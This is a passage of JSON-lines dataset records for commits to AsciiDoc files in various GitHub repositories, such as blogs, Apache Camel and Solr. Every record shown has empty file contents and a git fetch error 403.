presentation\n","repos":"flogarcdos\/tiempoTrab,flogarcdos\/tiempoTrab","old_file":"src\/docs\/asciidoc\/manualTecnico\/manualArquitectura\/bloques-componentes.adoc","new_file":"src\/docs\/asciidoc\/manualTecnico\/manualArquitectura\/bloques-componentes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flogarcdos\/tiempoTrab.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"53a7611570a71a9b4f3e5805719268e2d58caade","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d75d0395d2fe8f001eee6c46080f28c79e867b8","subject":"Included documentation for packaging","message":"Included documentation for packaging\n","repos":"mbrenn\/datenmeister-new,mbrenn\/datenmeister-new,mbrenn\/datenmeister-new,mbrenn\/datenmeister-new,mbrenn\/datenmeister-new","old_file":"docs\/development_packages.adoc","new_file":"docs\/development_packages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbrenn\/datenmeister-new.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36355c025d9878acb2f93adc05267ded08c40bf9","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-commons","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-commons.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"070325e65ffab715956d5ba55d89f621f440d329","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"126b125e64323cb58f256b7245a6cdb7a8f817e8","subject":"Update 2017-06-11-jira-to-slack-notification.adoc","message":"Update 
2017-06-11-jira-to-slack-notification.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-jira-to-slack-notification.adoc","new_file":"_posts\/2017-06-11-jira-to-slack-notification.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f44803e3852ec137b66352b97a9da183f5d99f12","subject":"Update 2015-10-08-Organizaciya-prostranstva-imen-v-JavaScript-prilozhenii.adoc","message":"Update 2015-10-08-Organizaciya-prostranstva-imen-v-JavaScript-prilozhenii.adoc","repos":"KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io,KlimMalgin\/klimmalgin.github.io","old_file":"_posts\/2015-10-08-Organizaciya-prostranstva-imen-v-JavaScript-prilozhenii.adoc","new_file":"_posts\/2015-10-08-Organizaciya-prostranstva-imen-v-JavaScript-prilozhenii.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KlimMalgin\/klimmalgin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9528ec89c3eafc7f9f20ca1efe0180133520ab0","subject":"Update 2016-07-22-La-solution-permet-de-trouver-les-indices-qui-y-menent.adoc","message":"Update 2016-07-22-La-solution-permet-de-trouver-les-indices-qui-y-menent.adoc","repos":"nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty","old_file":"_posts\/2016-07-22-La-solution-permet-de-trouver-les-indices-qui-y-menent.adoc","new_file":"_posts\/2016-07-22-La-solution-permet-de-trouver-les-indices-qui-y-menent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolaschaillot\/pechdencouty.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be6cb60566fd469834a36fa4022f97eab73ed5d2","subject":"Create usecases.adoc","message":"Create usecases.adoc","repos":"identinetics\/saml2test2,rohe\/saml2test2,rohe\/saml2test2,rohe\/saml2test2,identinetics\/saml2test2,rohe\/saml2test2,identinetics\/saml2test2,identinetics\/saml2test2","old_file":"doc\/usecases.adoc","new_file":"doc\/usecases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/identinetics\/saml2test2.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"173f69c976d1106a6524fc33829ee435a91a0a6c","subject":"Update 2015-12-25-Welcome-to-my-new-Blog.adoc","message":"Update 2015-12-25-Welcome-to-my-new-Blog.adoc","repos":"vuthaihoc\/vuthaihoc.github.io,vuthaihoc\/vuthaihoc.github.io,vuthaihoc\/vuthaihoc.github.io","old_file":"_posts\/2015-12-25-Welcome-to-my-new-Blog.adoc","new_file":"_posts\/2015-12-25-Welcome-to-my-new-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vuthaihoc\/vuthaihoc.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c1bddc0f1dd82449421e1b6de1d743a1cdcde13","subject":"Update 2018-05-01-Shakespeare-be-my-love.adoc","message":"Update 
2018-05-01-Shakespeare-be-my-love.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2018-05-01-Shakespeare-be-my-love.adoc","new_file":"_posts\/2018-05-01-Shakespeare-be-my-love.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a837d960edc0a9a64239efaa61fd2a5fc498341a","subject":"Add initial version of the release guide (building part).","message":"Add initial version of the release guide (building part).\n\nSigned-off-by: Gregor Zurowski <5fdc67d2166bcdd1d3aa4ed45ea5a25e9b21bc20@zurowski.org>\n","repos":"christophd\/camel,alvinkwekel\/camel,apache\/camel,pmoerenhout\/camel,apache\/camel,nicolaferraro\/camel,cunningt\/camel,zregvart\/camel,tadayosi\/camel,mcollovati\/camel,apache\/camel,pax95\/camel,pax95\/camel,DariusX\/camel,tdiesler\/camel,gnodet\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,DariusX\/camel,nikhilvibhav\/camel,Fabryprog\/camel,CodeSmell\/camel,objectiser\/camel,tdiesler\/camel,ullgren\/camel,mcollovati\/camel,tadayosi\/camel,zregvart\/camel,pmoerenhout\/camel,pax95\/camel,christophd\/camel,pmoerenhout\/camel,nicolaferraro\/camel,CodeSmell\/camel,pax95\/camel,alvinkwekel\/camel,Fabryprog\/camel,alvinkwekel\/camel,objectiser\/camel,davidkarlsen\/camel,tdiesler\/camel,cunningt\/camel,cunningt\/camel,gnodet\/camel,adessaigne\/camel,tdiesler\/camel,tadayosi\/camel,nicolaferraro\/camel,tadayosi\/camel,tadayosi\/camel,adessaigne\/camel,pax95\/camel,gnodet\/camel,alvinkwekel\/camel,pmoerenhout\/camel,christophd\/camel,apache\/camel,mcollovati\/camel,CodeSmell\/camel,pmoerenhout\/camel,zregvart\/camel,tdiesler\/camel,nikhilvibhav\/camel,christophd\/camel,gnodet\/camel,DariusX\/camel,ullgren\/camel,pmoerenhout\/camel,gnodet\/camel,mcollovati\/camel,adessaigne\/camel,Fabryprog\/camel,davidkarlsen\/camel,tadayosi\/camel,CodeSmell\/camel,DariusX\/camel,adessaigne\/camel,ullgren\/camel,Fabryprog\/camel,cunningt\/camel,adessaigne\/camel,adessaigne\/camel,christophd\/camel,objectiser\/camel,davidkarlsen\/camel,nicolaferraro\/camel,christophd\/camel,ullgren\/camel,apache\/camel,pax95\/camel,cunningt\/camel,apache\/camel,objectiser\/camel,tdiesler\/camel,cunningt\/camel,nikhilvibhav\/camel,zregvart\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/release-guide.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/release-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83c9cc3b565a38462bb799226b9d10ca5ee1d96d","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"846f61cbe188d1b366b7b4f1974b2b9c8c691460","subject":"y2b create post The Worst 
Text You Could Ever Receive...","message":"y2b create post The Worst Text You Could Ever Receive...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-16-The-Worst-Text-You-Could-Ever-Receive.adoc","new_file":"_posts\/2018-02-16-The-Worst-Text-You-Could-Ever-Receive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dd999f53dc7c33a8816503944a9122baeafafb9","subject":"Update 2014-05-08-Query-parameters-talk-slides.adoc","message":"Update 2014-05-08-Query-parameters-talk-slides.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2014-05-08-Query-parameters-talk-slides.adoc","new_file":"_posts\/2014-05-08-Query-parameters-talk-slides.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"677d9052f32c7d788c4c974164691d1cd80c3ec6","subject":"y2b create post Samsung UN65ES8000 65-Inch TV Unboxing (Samsung 8000 Series)","message":"y2b create post Samsung UN65ES8000 65-Inch TV Unboxing (Samsung 8000 Series)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-07-Samsung-UN65ES8000-65Inch-TV-Unboxing-Samsung-8000-Series.adoc","new_file":"_posts\/2012-12-07-Samsung-UN65ES8000-65Inch-TV-Unboxing-Samsung-8000-Series.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72dc1bcc47573cc7b23a4ac7e1ebad43b113460f","subject":"Publish 17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","message":"Publish 17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","new_file":"17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2514db7b5eebe19c286dd456d91bb6c59db3738","subject":"Update 2015-03-08-PGP-Email-Encryption.adoc","message":"Update 2015-03-08-PGP-Email-Encryption.adoc","repos":"hemantthakur\/hemantthakur.github.io,hemantthakur\/hemantthakur.github.io,hemantthakur\/hemantthakur.github.io","old_file":"_posts\/2015-03-08-PGP-Email-Encryption.adoc","new_file":"_posts\/2015-03-08-PGP-Email-Encryption.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hemantthakur\/hemantthakur.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c75cb86531c8aacef7a3c5e6fe0454222a71791","subject":"y2b create post Build Your Own Robot","message":"y2b create post Build Your Own 
Robot","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-21-Build-Your-Own-Robot.adoc","new_file":"_posts\/2015-10-21-Build-Your-Own-Robot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"607b4c5726f359ecc673c303dfdc0079410d46fe","subject":"Update 2016-07-01-Reading-Between-The-Bits.adoc","message":"Update 2016-07-01-Reading-Between-The-Bits.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-01-Reading-Between-The-Bits.adoc","new_file":"_posts\/2016-07-01-Reading-Between-The-Bits.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13c9b14a033d5f7aa2a33d498df223350d7a9e55","subject":"start of comparison JCache cache2k API","message":"start of comparison JCache cache2k API\n","repos":"cache2k\/cache2k,cache2k\/cache2k,cache2k\/cache2k","old_file":"documentation\/src\/docs\/asciidoc\/user-guide\/sections\/_jcache-vs-cache2k-api.adoc","new_file":"documentation\/src\/docs\/asciidoc\/user-guide\/sections\/_jcache-vs-cache2k-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cache2k\/cache2k.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"881e75ca9eca31926f95d4d10c953f8b0291c123","subject":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","message":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5823fab181561f25c397ab1995e083047ab9e3b6","subject":"Unlink because broken","message":"Unlink because broken\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/TestingEE.adoc","new_file":"Best practices\/TestingEE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f1ebe34396a09a2ec4a1b468321500f3e22e045","subject":"Update 2017-11-20-A-Stupids-Guide-to-Explaining-Concepts.adoc","message":"Update 2017-11-20-A-Stupids-Guide-to-Explaining-Concepts.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-A-Stupids-Guide-to-Explaining-Concepts.adoc","new_file":"_posts\/2017-11-20-A-Stupids-Guide-to-Explaining-Concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"7a1d0815f4b1b1dc0422344dda642e3b48d298e5","subject":"y2b create post Rocksmith Unboxing (PlayStation 3)","message":"y2b create post Rocksmith Unboxing (PlayStation 3)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-16-Rocksmith-Unboxing-PlayStation-3.adoc","new_file":"_posts\/2011-12-16-Rocksmith-Unboxing-PlayStation-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"764988f08a1bf1858cfc932d2da3a4ddad3acf49","subject":"Update 2016-01-20-Which-external-storage-device-should-you-be-using-in-2016.adoc","message":"Update 2016-01-20-Which-external-storage-device-should-you-be-using-in-2016.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2016-01-20-Which-external-storage-device-should-you-be-using-in-2016.adoc","new_file":"_posts\/2016-01-20-Which-external-storage-device-should-you-be-using-in-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71f9e61150e27451b4be7f739ad58cccc2191234","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9233081f9010d147da94a4cc1c9037d3005533f3","subject":"Update 2015-05-25-This-is-a-test.adoc","message":"Update 2015-05-25-This-is-a-test.adoc","repos":"dfmooreqqq\/dfmooreqqq.github.io,dfmooreqqq\/dfmooreqqq.github.io,dfmooreqqq\/dfmooreqqq.github.io","old_file":"_posts\/2015-05-25-This-is-a-test.adoc","new_file":"_posts\/2015-05-25-This-is-a-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dfmooreqqq\/dfmooreqqq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d92545715a79941e418e86a14b0b20712e7f3112","subject":"Update 2017-03-03-C-S-S-triangle.adoc","message":"Update 2017-03-03-C-S-S-triangle.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-C-S-S-triangle.adoc","new_file":"_posts\/2017-03-03-C-S-S-triangle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e021752a9ecfb0e6c22222c4a8bf30968c73fe58","subject":"Update 
2018-11-27-Hugo-Ascii-Doc.adoc","message":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50f8d673f1d15a81995df8e4152ac60bb2da0236","subject":"Update 2016-08-20-Trackpad-Woes.adoc","message":"Update 2016-08-20-Trackpad-Woes.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-08-20-Trackpad-Woes.adoc","new_file":"_posts\/2016-08-20-Trackpad-Woes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03b5b10c279cf9d6885d4efc345ab249ad2469be","subject":"Update 2015-11-05-Dive-into-Python-3.adoc","message":"Update 2015-11-05-Dive-into-Python-3.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-11-05-Dive-into-Python-3.adoc","new_file":"_posts\/2015-11-05-Dive-into-Python-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25d0572f4851e27e6a8d648c2058bcdbc714c160","subject":"Update 2017-03-31-Google-Apps-Script.adoc","message":"Update 2017-03-31-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9711b5fdef18c656e2c403ee7360ca1a373bbdfd","subject":"Update 2019-01-31-Hello-Github-World.adoc","message":"Update 2019-01-31-Hello-Github-World.adoc","repos":"mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io","old_file":"_posts\/2019-01-31-Hello-Github-World.adoc","new_file":"_posts\/2019-01-31-Hello-Github-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkhymohamed\/mkhymohamed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b41cfa5f3e45191e5e44c407468fd12f84ea9c5","subject":"Update 2015-02-16-asdfas.adoc","message":"Update 2015-02-16-asdfas.adoc","repos":"alchapone\/alchapone.github.io,alchapone\/alchapone.github.io,alchapone\/alchapone.github.io","old_file":"_posts\/2015-02-16-asdfas.adoc","new_file":"_posts\/2015-02-16-asdfas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alchapone\/alchapone.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c47322bfb0941108950d1806b3bf4e2a24ac31aa","subject":"Create README.adoc","message":"Create README.adoc","repos":"alejandroSuch\/angular-cli","old_file":"1.0.0-beta.19-3\/ubuntu\/README.adoc","new_file":"1.0.0-beta.19-3\/ubuntu\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alejandroSuch\/angular-cli.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc433a0b4d19f10c72ef58d4306d9aebd5e6bafc","subject":"zsh: Add more installation instructions","message":"zsh: Add more installation instructions\n\nNow that the configuration supports the XDG base directory\nspecification, the user should create those directories. This is\nimportant, because some applications fail when the directories do not\nexist already.\n","repos":"PigeonF\/.dotfiles","old_file":"zsh\/README.adoc","new_file":"zsh\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9958c3e81df6d8e1e6cabdb2f9dfb05e1659f34e","subject":"Added blog post about Forge 2.18.0.Final","message":"Added blog post about Forge 2.18.0.Final\n","repos":"forge\/docs,forge\/docs,luiz158\/docs,luiz158\/docs","old_file":"news\/2015-08-19-forge-2.18.0.final.asciidoc","new_file":"news\/2015-08-19-forge-2.18.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9c364b2d8640e84a2fe3b7a8d8adfc20d3d53e38","subject":"SOLR-12684: put expression names and params in monospace","message":"SOLR-12684: put expression names and params in monospace\n","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"solr\/solr-ref-guide\/src\/stream-decorator-reference.adoc","new_file":"solr\/solr-ref-guide\/src\/stream-decorator-reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/solr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef3912205738251c71f3137a6e0da2a0793ea8aa","subject":"Update 2016-06-15-The-softer-side-of-programming.adoc","message":"Update 2016-06-15-The-softer-side-of-programming.adoc","repos":"tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io","old_file":"_posts\/2016-06-15-The-softer-side-of-programming.adoc","new_file":"_posts\/2016-06-15-The-softer-side-of-programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedroeloffzen\/tedroeloffzen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"884522e824989045ff1b3042f81f2c5bf4f6041b","subject":"adding forward CDI post","message":"adding forward CDI post\n","repos":"antoinesd\/antoinesd.github.io,antoinesd\/antoinesd.github.io","old_file":"2014-03-15-forward-cdi-2-0.adoc","new_file":"2014-03-15-forward-cdi-2-0.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/antoinesd\/antoinesd.github.io.git\/': 
The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"caa4465999dbc8f441930f3ff943a80a9cfc221d","subject":"Added terser-language to Gitbook","message":"Added terser-language to Gitbook\n","repos":"adessaigne\/camel,dmvolod\/camel,veithen\/camel,JYBESSON\/camel,bgaudaen\/camel,christophd\/camel,veithen\/camel,hqstevenson\/camel,apache\/camel,sabre1041\/camel,kevinearls\/camel,tlehoux\/camel,JYBESSON\/camel,jkorab\/camel,driseley\/camel,salikjan\/camel,mcollovati\/camel,christophd\/camel,CodeSmell\/camel,nikhilvibhav\/camel,kevinearls\/camel,prashant2402\/camel,RohanHart\/camel,akhettar\/camel,onders86\/camel,christophd\/camel,objectiser\/camel,RohanHart\/camel,driseley\/camel,sverkera\/camel,tlehoux\/camel,DariusX\/camel,veithen\/camel,tadayosi\/camel,tkopczynski\/camel,pmoerenhout\/camel,prashant2402\/camel,pax95\/camel,onders86\/camel,driseley\/camel,isavin\/camel,drsquidop\/camel,mgyongyosi\/camel,w4tson\/camel,bhaveshdt\/camel,christophd\/camel,nboukhed\/camel,sverkera\/camel,CodeSmell\/camel,pkletsko\/camel,allancth\/camel,apache\/camel,gilfernandes\/camel,pmoerenhout\/camel,pmoerenhout\/camel,NickCis\/camel,snurmine\/camel,gilfernandes\/camel,rmarting\/camel,prashant2402\/camel,acartapanis\/camel,sabre1041\/camel,zregvart\/camel,gnodet\/camel,curso007\/camel,mgyongyosi\/camel,lburgazzoli\/camel,pax95\/camel,punkhorn\/camel-upstream,nboukhed\/camel,bhaveshdt\/camel,NickCis\/camel,dmvolod\/camel,pax95\/camel,n